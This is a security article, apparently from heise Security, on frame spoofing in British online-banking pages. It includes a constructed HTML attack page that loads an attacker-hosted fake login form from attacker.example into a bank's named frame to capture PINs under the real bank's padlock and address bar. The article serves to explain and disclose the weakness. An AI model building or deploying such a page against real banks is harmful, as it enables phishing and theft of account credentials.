Edward Henning, Jürgen Schmidt
You can't Bank on Security
Testing of UK bank pages reveals possible vulnerabilities
Quite rightly, banks advise their customers to take great care not to fall victim to phishing emails and other online risks. But, as heise Security discovered when checking the on-line pages of British banks, their customers would be a great deal safer if the banks accepted their responsibilities in this, and took much better precautions themselves.
Consider this situation: you receive an email that appears to come from your on-line bank. It tells you how the on-line system has been overhauled, and of new services, particularly how you can upgrade your on-line current account to earn interest. It gives you a link to follow in order to access this. You click on the link, and are taken to the familiar login page of the bank. You are concerned about security, and so you check the page carefully: it looks correct, the address bar contains the correct address, and the little padlock icon at the bottom shows it as an SSL secured page; you click on this icon, and up pops the certificate information, all present and correct. Satisfied, you enter your personal details, PIN, and then encounter an error. "Sorry, the server is experiencing problems, please try again later". After a while, you type in your bank URL directly, and find your account has been emptied. Your personal information had been sent to an attacker, and you have become the victim of a phishing attack.
This kind of attack is indeed possible if the web pages of your bank have not been sufficiently secured. For at least the last eight years security experts have known about a problem called frame spoofing. In 1998 Microsoft addressed this problem with a patch for Internet Explorer 4 on Windows 3.1. (Yes, we really are talking about that long ago: the period shortly after DOS.) Microsoft explained it quite correctly at the time: "This issue may enable a malicious Web site operator to mimic a legitimate Web site by inserting a window as a frame within the legitimate Web site's window."
Microsoft introduced a protection mechanism against this problem, the security zone setting "Navigate sub-frames across different domains", but unfortunately, up to and including Internet Explorer 6, the protection is not active by default: the setting is left enabled in the Internet zone, so any site may load its own content into a named frame belonging to another site. (Current beta versions of IE 7 finally disable it by default in the Internet zone.) This is one of the reasons that working with frames is considered insecure by security experts.
Nevertheless, many British banks still work with frames even in the most sensitive areas of their online banking, where you enter PINs and TANs (Personal Identification Numbers and Transaction Numbers). This allows potential attackers to create advanced spoofing attacks in which even an experienced user would not be able to distinguish between the attacker's page and the real site. Even SSL encryption does not protect against this: the address bar, the padlock and the certificate all describe the genuine outer page of the bank, while the frame in which you type your PIN is served by the attacker.
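To make the mechanism concrete, here is a constructed attacker page illustrating the frame spoofing described above. It is an added example, not code from the heise report or from any bank. The bank address (https://www.example-bank.test/), the frame name ("main") and the attacker host (attacker.example) are all invented for the illustration; a real attack would substitute the name of the frame that holds the targeted bank's login form.

```html
<!-- attacker.html: constructed demonstration of frame spoofing.
     Assumes a hypothetical bank whose login frameset at
     https://www.example-bank.test/ contains a frame named "main".
     All hosts and names below are invented for this example. -->
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Upgrade your account</title>
<script>
// Hypothetical bank frameset and the name of the frame holding its login form.
var BANK_URL   = "https://www.example-bank.test/";
var BANK_FRAME = "main";
// Attacker-controlled copy of the login form, served from the attacker's host.
var FAKE_LOGIN = "https://attacker.example/login.html";

function launch() {
  // Step 1: open the genuine bank site in a new window. Address bar,
  // padlock and certificate in that window all belong to the real bank.
  var bankWin = window.open(BANK_URL, "bankwin");
  if (!bankWin) {
    return; // popup blocked: the <a target=...> link below is the fallback
  }

  // Step 2: after the bank's frameset has had time to load, navigate the
  // frame by NAME. In IE 6 with the default Internet zone setting
  // "Navigate sub-frames across different domains" = Enable, a target name
  // that exists in another window is honoured even though that frame
  // belongs to a different domain. The outer bank window is untouched, so
  // every visible trust indicator still points at the bank, while the
  // login form the victim sees comes from attacker.example.
  setTimeout(function () {
    window.open(FAKE_LOGIN, BANK_FRAME);
  }, 3000);
}
</script>
</head>
<body onload="launch()">
  <p>Your account has been upgraded. If the login page did not open
     automatically, please
     <!-- Same attack without script: a plain link whose target is the
          bank's frame name. Clicking it also replaces that frame. -->
     <a href="https://attacker.example/login.html" target="main">click here</a>.
  </p>
</body>
</html>
```

The page at https://attacker.example/login.html would be a copy of the bank's login form that records the entered details and then shows the "server is experiencing problems" message from the scenario above. With "Navigate sub-frames across different domains" set to Disable (the IE 7 default, and what the heisec Browsercheck recommends), the browser refuses both the script and the link, because neither may load content into a frame of a page from another domain; current browsers apply comparable same-origin restrictions to named frame targets, so the page above is a historical illustration of the IE 6 behaviour. From the bank's side, the robust remedy is the one the article points to: do not put login forms and TAN entry inside frames at all.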
The following demonstrations worked as described at the time of writing this report, using Internet Explorer 6 with default settings. If, for example, you are using Internet Explorer and have optimised it for security following the instructions in the heisec Browsercheck, then the following demonstrations should not work. Naturally, we hope and expect that the banks concerned will fix the problems that we have highlighted, and so we also show here some screenshots of the results of these demonstrations to illustrate the principles involved.